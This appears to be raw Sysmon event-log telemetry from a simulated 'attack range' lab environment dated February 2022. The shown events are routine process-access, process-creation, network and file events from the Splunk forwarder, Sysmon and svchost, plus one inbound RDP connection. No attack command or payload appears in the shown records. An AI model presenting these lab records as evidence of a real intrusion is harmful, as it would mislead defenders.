10341000x8000000000000000219378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-150B-6216-C404-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-150B-6216-C404-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000295251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:44.677{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49217-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:48.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F73166C5E327572431381BFB6D282D,SHA256=96453A05A7809306A384A6636BF1A7DD162855084EE6B4B60EC0F99218FC047C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:45.782{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51517-false10.0.1.12-8089- 23542300x8000000000000000219406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:48.349{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D24F5A5119BE1159325C2F6BE7D6FE,SHA256=4D6DAE0A5334188C9CC726D95BC9BE6F25FE0170CDDC0BCEC15C5BA3901C013B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:48.349{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3654621868DCF484B9D3323D32F79F77,SHA256=FA8F6D0C25AECC200E6422C9BF8E42ECFA460759CC41F49A7355A31FB2A8F13A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:48.083{4F8D34B0-150B-6216-C504-000000003902}5241484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:49.849{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1919954B8331B2E17F66C7AF91714247,SHA256=DA7D9B3E61323A67BD78BA4DEDC190F950AB424E04676CB79AE2615E7548DF9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51518-false10.0.1.12-8000- 354300x8000000000000000219423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.189{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50295-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000219422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.568{4F8D34B0-150D-6216-C604-000000003902}36601952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-150D-6216-C604-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-150D-6216-C604-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.380{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-150D-6216-C604-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.381{4F8D34B0-150D-6216-C604-000000003902}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:49.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AD4C9C34A349BF8722A4812815DC3B,SHA256=F3DBEFBE5F916DCF649E4A2C8D52A0DAB57A073B57713CA89B51734EDA83240F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:49.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F976CA34F0C926F14049AAE2C8AB241D,SHA256=486CB6C0B90D6F0CBDA5DA7360CAA9A7A8DA961FB018E9DD2F4778F38368DE19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:49.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1EAE7E32C3E7C556398F00A3B0C326E6,SHA256=A89E9E4EC4AE77689E6598CBD929E10AFF302D89B2EE290B8B2D53B66830F5E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:50.858{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C979DDF4EB65755E3A02D652CB6984,SHA256=989E62110A4317B016B5FD71E55BE7032DD4DE4FF9D00684AC9EF5D96A8FD319,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EB2973091F3848F7F494EB8A5EA8CE8,SHA256=E10816DE53764FA733C68A447D88FE4206C16FCEDC52C67426A38B46F03F75D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD67A7D8294D6EC40CA80E1CFF851916,SHA256=998450899903331D0098E5C8C157C72605540C755666CFEE0407ACBEFC69A3D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.255{4F8D34B0-150E-6216-C704-000000003902}34722264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-150E-6216-C704-000000003902}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.052{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 